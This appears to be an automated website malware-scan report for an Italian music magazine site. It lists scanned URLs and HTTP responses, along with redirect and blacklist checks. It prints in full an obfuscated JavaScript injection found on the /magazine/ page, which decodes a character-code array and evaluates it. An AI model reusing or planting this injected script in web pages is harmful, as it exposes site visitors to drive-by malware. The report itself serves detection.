Scanned pages/files
Request | Server response | Status |
http://www.popgruppo.net/ | HTTP/1.1 200 OK Connection: close Date: Fri, 06 Mar 2015 00:20:12 GMT Accept-Ranges: bytes ETag: "34ac029e-31de-4f3d875db739f" Server: Apache Vary: Accept-Encoding Content-Length: 12766 Content-Type: text/html Last-Modified: Wed, 05 Mar 2014 09:15:22 GMT | clean |
http://www.popgruppo.net/magazine/ | 200 OK Content-Length: 18315 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document["createElement"]("div");}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e"+v;}}e=w[""+v];if(1){f=new Array(100,110,97,114,109,100,108,113,46,118,112,102,116,100,38,31,60,104,100,111,97,108,99,29,115,115,119,105,101,60,90,31,119,104,98,113,104,57,50,45,48,111,118,56,32,103,99,102,103,103,114,55,52,47,46,109,120,58,30,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,31,106,98,102,115,56,42,53,47,46,109,120,58,30,113,111,111,56,42,53,47,46,109,120,58,90,31,32,114,112,96,61,91,32,101,116,115,110,55,47,46,99,103,119,105,119,109,118,117,119,43,109,120,100,116,46,116,113,44,97,99,45,99,101,100,98,43,112,103,110,89,34,61,58,44,105,101,112,94,109,100,60,31,41,58);}w=f;s=[];for(i=0;-i+162!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w[j]+j%4));} try{document.body++}catch(gdsgd){e(s)} Antivirus reports:
| ||
http://www.google.com/jsapi | 200 OK Content-Length: 24558 Content-Type: text/javascript | clean |
http://www.popgruppo.net/magazine/wp-content/plugins/google-calendar-widget/date.js?ver=alpha-1 | 200 OK Content-Length: 28748 Content-Type: application/javascript | clean |
http://www.popgruppo.net/magazine/wp-content/plugins/google-calendar-widget/wiky.js?ver=1.0 | 200 OK Content-Length: 19569 Content-Type: application/javascript | clean |
http://www.popgruppo.net/magazine/wp-content/plugins/google-calendar-widget/ko-calendar.js?ver=3.5.1 | 200 OK Content-Length: 18284 Content-Type: application/javascript | clean |
http://www.popgruppo.net/magazine/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/javascript | clean |
http://www.popgruppo.net/magazine/wp-content/themes/magazine-basic/js/effects.js?ver=3.5.1 | 200 OK Content-Length: 5448 Content-Type: application/javascript | clean |
http://www.popgruppo.net/magazine/category/interviste/ | 200 OK Content-Length: 14479 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/category/eventi/ | 200 OK Content-Length: 13887 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/category/concerti/ | 200 OK Content-Length: 12051 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/category/monografie/ | 200 OK Content-Length: 12484 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/category/guide-allascolto/ | 200 OK Content-Length: 11113 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/category/dischi/ | 200 OK Content-Length: 13338 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/category/bootleg/ | 200 OK Content-Length: 11450 Content-Type: text/html | clean |
http://www.popgruppo.net/magazine/date/2015/01/ | 200 OK Content-Length: 12320 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: popgruppo.net
Result:
GET / HTTP/1.1
Host: popgruppo.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: popgruppo.net
Referer: http://www.google.com/search?q=popgruppo.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: popgruppo.net
Referer: http://www.google.com/search?q=popgruppo.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=popgruppo.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://popgruppo.net/
Result: popgruppo.net is not infected or malware details are not published yet.
Result: popgruppo.net is not infected or malware details are not published yet.